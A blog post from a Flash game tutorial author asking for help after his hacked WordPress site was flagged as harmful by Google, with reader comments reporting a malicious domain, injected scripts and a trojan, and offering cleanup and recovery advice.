Help needed
Filed Under This blog in the net •
This is what I found today in Google search engine:
I know I shouldn’t talk about attacks because it just made more attacks to happen, but this time I really don’t know what to do.
I receive half of the traffic from Google and really don’t know what to do.
I know my site was hacked but during the last days I manually cleaned the site.
I made all steps required on StopBadware.org but the problem still remains.
If you have any clue or should you find another harmful script from now on, can you please comment the post with your problem/opinion.
Tell me what do you think about this post. I'll write better and better entries.
(No Ratings Yet)
Loading ...15 Responses to “Help needed”
Leave a Reply
Trackbacks
-
2 years of blogging : Emanuele Feronato - italian geek and PROgrammer on
May 26th, 2008 4:21 pm
[...] A lot of funny things happened during this year… Google slapped me down from PR7 to PR4, then the site was hacked a dozen times and marked by Google as an harmful site. [...]
-
Latest MochiAds Games
If you think you resolved the problem then you have to a Request a review from google. Info in this link:
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
You may have follow the steps off StopBadware.org however like is said on the google page:
“This identification is based in part on guidelines set by StopBadware.org. However, Google uses its own criteria,…”
Hi Emanuele,
I’ve been visiting your site for a long time now and I’m sorry you’ve had these attacks.
I’ve been very wary of checking your site recently as my anti virus software constantly pops up stating that there is a malicious script on the page.
Unfortunately I can’t really lend much of a hand without seeing what exactly is going on with your code.
All I can advise is talking to the Wordpress guys and doing some googling. If your database tables havn’t been compromised, or you have earlier backups, perhaps you should look into reinstalling wordpress and see if that cleans things up.
Do you know how they gained access to your site? I’d try going to a quality php help forum and asking their users to find XSS (cross site scripting), MySQL injection etc. vulnerabilities. One such forum is http://www.phpfreaks.com/forums/. They have some really helpful guys over there who know their stuff.
Again, your best bet would be to go straight to Wordpress and see if they have any answers. If I come across anything you may find useful I’ll definately let you know.
Best of luck sorting it out and getting things back to normal!
- Adam Owen
Hi,
I can’t help with how to solve it but if it is any help my firewall blocked an attack when I accessed your site reporting this: HTTP Quicktime RTSP URI BO. The attacking site was shown as ewbyuno.com. I don’t know anything about curing this though.
I’m sorry this has happened to your site, I visit it daily and find it excellent. Hope you find a way to solve it.
You may want to delete this comment to stop that threat report being picked up by google and making your search report worse.
ok… time to buy google and fire some morons then…
Hi,
I’m sorry for what’s happening… But i can’t solve it. Try asking in a forum…
I’m here to do a sugestion: Can you explain how to do a game like this: http://www.newgrounds.com/portal/view/420167 ?
Thanks,
Gabriel…..
LOL what a game… sure I will do a tut for a game like this… reminds me old c64 games… it’s a game with an huge potential
are being ironic? =DD
I made a quick search on ewbyuno.com and I found this : http://www.phpbb.com/community/viewtopic.php?f=1&t=698065&p=3888725
I hope it can help.
I’d black list this site (ewbyuno) as soon as possible.
A while ago there was some “unresponsive script” on your site - I assume it was coming from one of the flash ads. Maybe this was the source of google’s claims? This seems unlikely because its only flash, and wouldnt be the cause of installing spyware etc. but it could still be worth investigating.
Still, whatever google think I will be sure to keep visiting your website (and recommending that all my friends go) as it provides useful, easy-to-follow tutorials!
ehy emanuele il tuo sito da’ problemi su moltissimi pc.. per esempio guardandolo dall’ufficio non faccio nemmeno in tempo a farlo aprire che mi da’ degli errori di visualizzazione e poi mi blocca explorer !!!!
alcuni dei tutorial flash soprattutto quelli dopo l’attacco hacker fanno impallare la pagina come se il flash andasse in loop per qualche motivo!
spero di esserti stato di aiuto!!!
Massy
http://www.flashwizardgames.com - visit my site
wen i go to your site a bar comes up about some plugin thing to do with active x or something… that might have something to do with it
On the homepage of this site, ewbyuno is trying to run scripts, I have a addon for firefox which blocks all script unless I allow it, so I haven’t noticed it before.
It is these foolish ads from Zapak and Amazon in your blank spaces.
I think these are causing the problems.
Or, Have you seen any social networking site.
If anyone wants to read your site, he should first sign in.
It would prevent it somehow.
I actually got a the Backdoor-Icug keylogging trojan (http://vil.nai.com/vil/content/v_142500.htm) from your site a while back. I had old versions of the flash player (r47) and quicktime installed. Adobe and Apple have since released security notices for these versions. I reported the problems to Mozilla and they’re working on a way to disable old plugins automatically, but it’s not ready yet.
Anyway, after cleaning things up, reinstalling, and updating my versions, I visited your site again in forensic mode and I found various javascript injection exploits on your site, one of which tried to inject a bad qt stream as someone above mentioned. It looks like there is still bad js in syntax_hilite_js.js, for example.
I think you need to assume your site and your personal computers have been completely comprimised with keyloggers that have detected your passwords and everything, and treat everything as infected and install fresh from original media (be careful about xp before you’ve done all the security updates, hopefully you have a firewall at home, but also make sure it is not set up for remote administration). Do a database backup of your blog so you don’t lose the great material you’ve written, but after you’ve backed up the data, call your ISP on the phone and have them wipe your account and then verbally tell you the password, and then don’t enter it until you’ve wiped your machine and reinstalled the OS from the original CDs. I would also change all of your bank passwords and whatnot since these keyloggers often look for bank website logins.
Good luck,
Chris